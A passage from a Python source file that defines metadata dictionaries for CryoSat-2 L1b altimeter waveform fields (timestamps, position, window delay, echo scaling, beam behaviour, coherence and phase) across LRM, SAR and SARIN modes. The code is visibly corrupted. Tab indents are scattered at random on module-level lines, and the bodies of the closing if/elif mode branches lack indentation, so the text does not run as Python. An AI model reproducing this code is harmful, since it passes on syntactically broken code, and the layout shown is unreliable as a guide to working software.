'Scale power "B"')
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 1
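	#-- Editorial note (sketch): applying the scaling documented above to the
	#-- 1Hz averaged waveform, with A = Linear_Wfm_Multiplier and
	#-- B = Power2_Wfm_Multiplier (broadcast over the 128 bins):
	#--     power_watts = counts*(A*1e-9)*(2.0**B)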
#-- Number of echoes averaged
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes'] = {}
	L1b_1Hz_LRM_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of '
'echoes averaged')
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes']['description'] = ('Normally '
		'1820 for LRM (= 91 averaged on-board * 20)')
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes']['hertz'] = 1
#-- Flags
L1b_1Hz_LRM_wfm_attributes['Flags'] = {}
L1b_1Hz_LRM_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_1Hz_LRM_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-3a of the "L1b Products '
'Format Specification" document')
L1b_1Hz_LRM_wfm_attributes['Flags']['flag_meanings'] = \
'1_hz_echo_error_not_computed mispointing_bad_angles'
L1b_1Hz_LRM_wfm_attributes['Flags']['hertz'] = 1
#-- SAR Mode
L1b_1Hz_SAR_wfm_attributes = {}
#-- Data Record Time (MDSR Time Stamp)
L1b_1Hz_SAR_wfm_attributes['Day'] = {}
L1b_1Hz_SAR_wfm_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_1Hz_SAR_wfm_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_1Hz_SAR_wfm_attributes['Day']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SAR_wfm_attributes['Day']['hertz'] = 1
#-- Time: second part
L1b_1Hz_SAR_wfm_attributes['Second'] = {}
L1b_1Hz_SAR_wfm_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_1Hz_SAR_wfm_attributes['Second']['units'] = 'seconds'
L1b_1Hz_SAR_wfm_attributes['Second']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SAR_wfm_attributes['Second']['hertz'] = 1
#-- Time: microsecond part
L1b_1Hz_SAR_wfm_attributes['Micsec'] = {}
L1b_1Hz_SAR_wfm_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_1Hz_SAR_wfm_attributes['Micsec']['units'] = 'microseconds'
	L1b_1Hz_SAR_wfm_attributes['Micsec']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SAR_wfm_attributes['Micsec']['hertz'] = 1
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SAR_wfm_attributes['Lat'] = {}
L1b_1Hz_SAR_wfm_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_1Hz_SAR_wfm_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SAR_wfm_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_1Hz_SAR_wfm_attributes['Lat']['valid_min'] = -9e8
L1b_1Hz_SAR_wfm_attributes['Lat']['valid_max'] = 9e8
L1b_1Hz_SAR_wfm_attributes['Lat']['hertz'] = 1
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SAR_wfm_attributes['Lon'] = {}
L1b_1Hz_SAR_wfm_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_1Hz_SAR_wfm_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SAR_wfm_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_1Hz_SAR_wfm_attributes['Lon']['valid_min'] = -18e8
L1b_1Hz_SAR_wfm_attributes['Lon']['valid_max'] = 18e8
L1b_1Hz_SAR_wfm_attributes['Lon']['hertz'] = 1
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_1Hz_SAR_wfm_attributes['Alt'] = {}
L1b_1Hz_SAR_wfm_attributes['Alt']['long_name'] = 'Altitude'
L1b_1Hz_SAR_wfm_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_1Hz_SAR_wfm_attributes['Alt']['units'] = 'millimeters'
L1b_1Hz_SAR_wfm_attributes['Alt']['hertz'] = 1
#-- Window Delay (two-way) corrected for instrument delays
L1b_1Hz_SAR_wfm_attributes['TD'] = {}
	L1b_1Hz_SAR_wfm_attributes['TD']['long_name'] = 'Window Delay'
L1b_1Hz_SAR_wfm_attributes['TD']['description'] = ('Window Delay '
'(two-way) from the telemetry corrected for instrument delays')
L1b_1Hz_SAR_wfm_attributes['TD']['units'] = 'picoseconds'
L1b_1Hz_SAR_wfm_attributes['TD']['hertz'] = 1
#-- 1 Hz Averaged Power Echo Waveform
L1b_1Hz_SAR_wfm_attributes['Waveform'] = {}
L1b_1Hz_SAR_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_1Hz_SAR_wfm_attributes['Waveform']['description'] = ('Array of 128 bins. '
'Averaged from all individual L0 echoes in approx 1 second (5120 for SAR). '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B. The last 1Hz average waveform of the product '
'is meaningless in most of the cases because there are not enough FBR '
'samples to be used in the averaging operation. When this happens the '
'waveform is flagged as invalid')
L1b_1Hz_SAR_wfm_attributes['Waveform']['valid_min'] = 0
L1b_1Hz_SAR_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_1Hz_SAR_wfm_attributes['Waveform']['hertz'] = 1
#-- Echo Scale Factor (to scale echo to watts)
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 1
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 1
#-- Number of echoes averaged
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes'] = {}
	L1b_1Hz_SAR_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of '
'echoes averaged')
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes']['description'] = ('Normally 5120'
' for SAR. May be lower if individual echoes are missing or rejected')
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes']['hertz'] = 1
#-- Flags
L1b_1Hz_SAR_wfm_attributes['Flags'] = {}
L1b_1Hz_SAR_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_1Hz_SAR_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-3b of the "L1b Products '
'Format Specification" document')
L1b_1Hz_SAR_wfm_attributes['Flags']['flag_meanings'] = \
'1_hz_echo_error_not_computed mispointing_bad_angles'
L1b_1Hz_SAR_wfm_attributes['Flags']['hertz'] = 1
#-- SARIN Mode
#-- Same as the LRM/SAR groups but the waveform array is 512 bins instead of
#-- 128 and the number of echoes averaged is different.
L1b_1Hz_SARIN_wfm_attributes = {}
#-- Data Record Time (MDSR Time Stamp)
L1b_1Hz_SARIN_wfm_attributes['Day'] = {}
L1b_1Hz_SARIN_wfm_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_1Hz_SARIN_wfm_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_1Hz_SARIN_wfm_attributes['Day']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SARIN_wfm_attributes['Day']['hertz'] = 1
#-- Time: second part
L1b_1Hz_SARIN_wfm_attributes['Second'] = {}
L1b_1Hz_SARIN_wfm_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_1Hz_SARIN_wfm_attributes['Second']['units'] = 'seconds'
L1b_1Hz_SARIN_wfm_attributes['Second']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SARIN_wfm_attributes['Second']['hertz'] = 1
#-- Time: microsecond part
L1b_1Hz_SARIN_wfm_attributes['Micsec'] = {}
L1b_1Hz_SARIN_wfm_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_1Hz_SARIN_wfm_attributes['Micsec']['units'] = 'microseconds'
	L1b_1Hz_SARIN_wfm_attributes['Micsec']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SARIN_wfm_attributes['Micsec']['hertz'] = 1
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SARIN_wfm_attributes['Lat'] = {}
L1b_1Hz_SARIN_wfm_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_1Hz_SARIN_wfm_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SARIN_wfm_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_1Hz_SARIN_wfm_attributes['Lat']['valid_min'] = -9e8
L1b_1Hz_SARIN_wfm_attributes['Lat']['valid_max'] = 9e8
L1b_1Hz_SARIN_wfm_attributes['Lat']['hertz'] = 1
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SARIN_wfm_attributes['Lon'] = {}
L1b_1Hz_SARIN_wfm_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_1Hz_SARIN_wfm_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SARIN_wfm_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_1Hz_SARIN_wfm_attributes['Lon']['valid_min'] = -18e8
L1b_1Hz_SARIN_wfm_attributes['Lon']['valid_max'] = 18e8
L1b_1Hz_SARIN_wfm_attributes['Lon']['hertz'] = 1
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_1Hz_SARIN_wfm_attributes['Alt'] = {}
L1b_1Hz_SARIN_wfm_attributes['Alt']['long_name'] = 'Altitude'
L1b_1Hz_SARIN_wfm_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_1Hz_SARIN_wfm_attributes['Alt']['units'] = 'millimeters'
L1b_1Hz_SARIN_wfm_attributes['Alt']['hertz'] = 1
#-- Window Delay (two-way) corrected for instrument delays
L1b_1Hz_SARIN_wfm_attributes['TD'] = {}
	L1b_1Hz_SARIN_wfm_attributes['TD']['long_name'] = 'Window Delay'
L1b_1Hz_SARIN_wfm_attributes['TD']['description'] = ('Window Delay '
'(two-way) from the telemetry corrected for instrument delays')
L1b_1Hz_SARIN_wfm_attributes['TD']['units'] = 'picoseconds'
L1b_1Hz_SARIN_wfm_attributes['TD']['hertz'] = 1
#-- 1 Hz Averaged Power Echo Waveform
L1b_1Hz_SARIN_wfm_attributes['Waveform'] = {}
L1b_1Hz_SARIN_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_1Hz_SARIN_wfm_attributes['Waveform']['description'] = ('Array of 512 bins. '
'Averaged from all individual 1280 L0 echoes in SARin mode. '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B. The last 1Hz average waveform of the product '
'is meaningless in most of the cases because there are not enough FBR '
'samples to be used in the averaging operation. When this happens the '
'waveform is flagged as invalid')
L1b_1Hz_SARIN_wfm_attributes['Waveform']['valid_min'] = 0
L1b_1Hz_SARIN_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_1Hz_SARIN_wfm_attributes['Waveform']['hertz'] = 1
#-- Echo Scale Factor (to scale echo to watts)
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 1
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 1
#-- Number of echoes averaged
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes'] = {}
	L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of '
'echoes averaged')
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes']['description'] = ('Normally 1280'
' for SARIN. May be lower if individual echoes are missing or rejected')
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes']['hertz'] = 1
#-- Flags
L1b_1Hz_SARIN_wfm_attributes['Flags'] = {}
L1b_1Hz_SARIN_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_1Hz_SARIN_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-3b of the "L1b Products '
'Format Specification" document')
L1b_1Hz_SARIN_wfm_attributes['Flags']['flag_meanings'] = \
'1_hz_echo_error_not_computed mispointing_bad_angles'
L1b_1Hz_SARIN_wfm_attributes['Flags']['hertz'] = 1
#-- CryoSat-2 Waveforms Groups
#-- Beam Behavior Parameters
L1b_BB_attributes = {}
#-- Standard Deviation of Gaussian fit to range integrated stack power.
L1b_BB_attributes['SD'] = {}
L1b_BB_attributes['SD']['long_name'] = 'Standard Deviation'
L1b_BB_attributes['SD']['description'] = ('Standard Deviation of Gaussian '
'fit to range integrated stack power')
L1b_BB_attributes['SD']['units'] = '1/100'
L1b_BB_attributes['SD']['hertz'] = 20
#-- Stack Center: Mean of Gaussian fit to range integrated stack power.
L1b_BB_attributes['Center'] = {}
L1b_BB_attributes['Center']['long_name'] = 'Stack Center'
L1b_BB_attributes['Center']['description'] = ('Mean of Gaussian fit to '
'range integrated stack power')
L1b_BB_attributes['Center']['units'] = '1/100'
L1b_BB_attributes['Center']['hertz'] = 20
#-- Stack amplitude parameter scaled in dB/100.
L1b_BB_attributes['Amplitude'] = {}
L1b_BB_attributes['Amplitude']['long_name'] = 'Stack amplitude'
L1b_BB_attributes['Amplitude']['description'] = 'Amplitude Parameter'
L1b_BB_attributes['Amplitude']['units'] = 'dB/100'
L1b_BB_attributes['Amplitude']['hertz'] = 20
#-- 3rd moment: providing the degree of asymmetry of the range integrated
#-- stack power distribution.
L1b_BB_attributes['Skewness'] = {}
L1b_BB_attributes['Skewness']['long_name'] = 'Stack Skewness'
L1b_BB_attributes['Skewness']['description'] = ('3rd moment: providing the '
'degree of asymmetry of the range integrated stack power distribution')
L1b_BB_attributes['Skewness']['units'] = '1/100'
L1b_BB_attributes['Skewness']['_FillValue'] = -99900
L1b_BB_attributes['Skewness']['hertz'] = 20
#-- 4th moment: Measure of peakiness of range integrated stack power distribution.
L1b_BB_attributes['Kurtosis'] = {}
L1b_BB_attributes['Kurtosis']['long_name'] = 'Stack Kurtosis'
L1b_BB_attributes['Kurtosis']['description'] = ('4th moment: measure of '
'peakiness of range integrated stack power distribution')
L1b_BB_attributes['Kurtosis']['units'] = '1/100'
L1b_BB_attributes['Kurtosis']['_FillValue'] = -99900
L1b_BB_attributes['Kurtosis']['hertz'] = 20
#-- Stack peakiness computed from the range integrated power of the single look echoes
L1b_BB_attributes['Peakiness'] = {}
L1b_BB_attributes['Peakiness']['long_name'] = 'Stack Peakiness'
L1b_BB_attributes['Peakiness']['description'] = ('Stack peakiness computed '
'from the range integrated power of the single look echoes within a '
'stack. Stack peakiness is defined as the inverse of the average of '
'the range integrated power normalized for the power at zero look angle')
L1b_BB_attributes['Peakiness']['units'] = '1/100'
L1b_BB_attributes['Peakiness']['_FillValue'] = -99900
L1b_BB_attributes['Peakiness']['hertz'] = 20
#-- Stack residuals of Gaussian that fits the range integrated power of the single look echoes
L1b_BB_attributes['RMS'] = {}
L1b_BB_attributes['RMS']['long_name'] = 'Gaussian Power Fit Residuals'
L1b_BB_attributes['RMS']['description'] = ('Residuals of Gaussian that '
'fits the range integrated power of the single look echoes within a '
'stack. It is the root mean squared error between the Gaussian fitting '
'and the range integrated power of the single look echoes within a stack')
	L1b_BB_attributes['RMS']['units'] = 'dBW'
L1b_BB_attributes['RMS']['_FillValue'] = -99900
L1b_BB_attributes['RMS']['hertz'] = 20
#-- Standard deviation as a function of boresight angle (microradians)
L1b_BB_attributes['SD_boresight_angle'] = {}
L1b_BB_attributes['SD_boresight_angle']['long_name'] = 'Standard Deviation'
L1b_BB_attributes['SD_boresight_angle']['description'] = ('Standard '
'deviation as a function of boresight angle')
L1b_BB_attributes['SD_boresight_angle']['units'] = 'microradians'
L1b_BB_attributes['SD_boresight_angle']['valid_min'] = 0
L1b_BB_attributes['SD_boresight_angle']['valid_max'] = 65525
L1b_BB_attributes['SD_boresight_angle']['hertz'] = 20
#-- Stack Center angle as a function of boresight angle (microradians)
L1b_BB_attributes['Center_boresight_angle'] = {}
L1b_BB_attributes['Center_boresight_angle']['long_name'] = 'Stack Centre Angle'
L1b_BB_attributes['Center_boresight_angle']['description'] = ('Stack Centre '
'angle as a function of boresight angle')
L1b_BB_attributes['Center_boresight_angle']['units'] = 'microradians'
L1b_BB_attributes['Center_boresight_angle']['valid_min'] = -32768
L1b_BB_attributes['Center_boresight_angle']['valid_max'] = 32768
L1b_BB_attributes['Center_boresight_angle']['hertz'] = 20
#-- Stack Center angle as a function of look angle (microradians)
L1b_BB_attributes['Center_look_angle'] = {}
L1b_BB_attributes['Center_look_angle']['long_name'] = 'Stack Centre Angle'
L1b_BB_attributes['Center_look_angle']['description'] = ('Stack Centre '
'angle as a function of look angle')
L1b_BB_attributes['Center_look_angle']['units'] = 'microradians'
L1b_BB_attributes['Center_look_angle']['valid_min'] = -32768
L1b_BB_attributes['Center_look_angle']['valid_max'] = 32768
L1b_BB_attributes['Center_look_angle']['hertz'] = 20
#-- Number of contributing beams in the stack before weighting
L1b_BB_attributes['Number'] = {}
L1b_BB_attributes['Number']['long_name'] = ('Number of contributing '
'beams before weighting')
L1b_BB_attributes['Number']['description'] = ('Number of contributing '
'beams in the stack before weighting: number of single look echoes '
'in the stack before the Surface Sample Stack weighting is applied')
L1b_BB_attributes['Number']['units'] = 'count'
L1b_BB_attributes['Number']['hertz'] = 20
#-- Number of contributing beams in the stack after weighting
L1b_BB_attributes['Weighted_Number'] = {}
L1b_BB_attributes['Weighted_Number']['long_name'] = ('Number of contributing '
'beams after weighting')
L1b_BB_attributes['Weighted_Number']['description'] = ('Number of contributing '
'beams in the stack after weighting: number of single look echoes '
'in the stack after the Surface Sample Stack weighting is applied')
L1b_BB_attributes['Weighted_Number']['units'] = 'count'
L1b_BB_attributes['Weighted_Number']['hertz'] = 20
#-- Low-Resolution Mode
L1b_20Hz_LRM_wfm_attributes = {}
#-- Averaged Power Echo Waveform
L1b_20Hz_LRM_wfm_attributes['Waveform'] = {}
L1b_20Hz_LRM_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_20Hz_LRM_wfm_attributes['Waveform']['description'] = ('Array of 128 bins. '
		'Averaged (on-board) from 91 individual echoes in pulse limited mode (LRM). '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B')
L1b_20Hz_LRM_wfm_attributes['Waveform']['valid_min'] = 0
L1b_20Hz_LRM_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_20Hz_LRM_wfm_attributes['Waveform']['hertz'] = 20
#-- Echo Scale Factor (to scale echo to watts)
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 20
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 20
#-- Number of echoes averaged
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes'] = {}
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of '
	'echoes averaged')
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes']['description'] = ('Normally '
'91 for LRM')
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes']['hertz'] = 20
#-- Flags
L1b_20Hz_LRM_wfm_attributes['Flags'] = {}
L1b_20Hz_LRM_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_20Hz_LRM_wfm_attributes['Flags']['description'] = ('TRK cycle report '
'(as extracted from the L0). See table 2.3.4-4a of the "L1b Products '
'Format Specification" document')
L1b_20Hz_LRM_wfm_attributes['Flags']['hertz'] = 20
#-- SAR Mode
L1b_20Hz_SAR_wfm_attributes = {}
#-- Averaged Power Echo Waveform
L1b_20Hz_SAR_wfm_attributes['Waveform'] = {}
L1b_20Hz_SAR_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_20Hz_SAR_wfm_attributes['Waveform']['description'] = ('Array of 256 bins. '
'Averaged from a set of Doppler beam echoes formed at a common surface '
'location. Converted to Watts by using the scaling parameters. '
'Power in Watts = counts*(A*1e-9)*2^B.')
L1b_20Hz_SAR_wfm_attributes['Waveform']['valid_min'] = 0
L1b_20Hz_SAR_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_20Hz_SAR_wfm_attributes['Waveform']['hertz'] = 20
#-- Echo Scale Factor (to scale echo to watts)
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 20
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 20
#-- Number of echoes averaged
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes'] = {}
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of '
	'echoes averaged')
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes']['description'] = ('Normally 280'
' for SAR')
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes']['hertz'] = 20
#-- Flags
L1b_20Hz_SAR_wfm_attributes['Flags'] = {}
L1b_20Hz_SAR_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_20Hz_SAR_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-4b of the "L1b Products '
'Format Specification" document')
L1b_20Hz_SAR_wfm_attributes['Flags']['hertz'] = 20
#-- Beam Behavior Parameters
L1b_20Hz_SAR_wfm_attributes['Beam'] = L1b_BB_attributes
#-- SARIN Mode
L1b_20Hz_SARIN_wfm_attributes = {}
#-- Averaged Power Echo Waveform
L1b_20Hz_SARIN_wfm_attributes['Waveform'] = {}
L1b_20Hz_SARIN_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_20Hz_SARIN_wfm_attributes['Waveform']['description'] = ('Array of 1024 bins. '
'Averaged from 2 sets of Doppler beam echoes formed (on 2 receive '
'channels) at a common surface location. Converted to Watts by using '
'the scaling parameters. Power in Watts = counts*(A*1e-9)*2^B.')
L1b_20Hz_SARIN_wfm_attributes['Waveform']['valid_min'] = 0
L1b_20Hz_SARIN_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_20Hz_SARIN_wfm_attributes['Waveform']['hertz'] = 20
#-- Echo Scale Factor (to scale echo to watts)
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 20
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 20
#-- Number of echoes averaged
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes'] = {}
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of '
	'echoes averaged')
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes']['description'] = ('Normally 70'
' for SARIN')
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes']['hertz'] = 20
#-- Flags
L1b_20Hz_SARIN_wfm_attributes['Flags'] = {}
L1b_20Hz_SARIN_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_20Hz_SARIN_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-4b of the "L1b Products '
'Format Specification" document')
L1b_20Hz_SARIN_wfm_attributes['Flags']['hertz'] = 20
#-- Coherence [1024]: packed units (1/1000)
L1b_20Hz_SARIN_wfm_attributes['Coherence'] = {}
L1b_20Hz_SARIN_wfm_attributes['Coherence']['long_name'] = 'Coherence'
L1b_20Hz_SARIN_wfm_attributes['Coherence']['description'] = ('Array of '
'1024 bins. Computed from the complex echoes on the 2 Rx channels')
L1b_20Hz_SARIN_wfm_attributes['Coherence']['units'] = '1/1000'
L1b_20Hz_SARIN_wfm_attributes['Coherence']['hertz'] = 20
#-- Phase Difference [1024]: packed units (microradians)
L1b_20Hz_SARIN_wfm_attributes['Phase_diff'] = {}
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['long_name'] = 'Phase Difference'
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['description'] = ('Array of '
'1024 bins. Computed from the complex echoes on the 2 Rx channels')
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['units'] = 'microradians'
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['valid_min'] = -3141593
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['valid_max'] = 3141593
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['hertz'] = 20
#-- Beam Behavior Parameters
L1b_20Hz_SARIN_wfm_attributes['Beam'] = L1b_BB_attributes
#-- Bind all the l1b attributes together into single dictionary
CS_l1b_attrib = {}
CS_l1b_attrib['Location'] = L1b_location_attributes
CS_l1b_attrib['Data'] = L1b_measurement_attributes
CS_l1b_attrib['Geometry'] = L1b_corr_attributes
if (MODE == 'LRM'):
CS_l1b_attrib['Waveform_1Hz'] = L1b_1Hz_LRM_wfm_attributes
CS_l1b_attrib['Waveform_20Hz'] = L1b_20Hz_LRM_wfm_attributes
elif (MODE == 'SAR'):
CS_l1b_attrib['Waveform_1Hz'] = L1b_1Hz_SAR_wfm_attributes
CS_l1b_attrib['Waveform_20Hz'] = L1b_20Hz_SAR_wfm_attributes
elif (MODE == 'SIN'):
CS_l1b_attrib['Waveform_1Hz'] = L1b_1Hz_SARIN_wfm_attributes
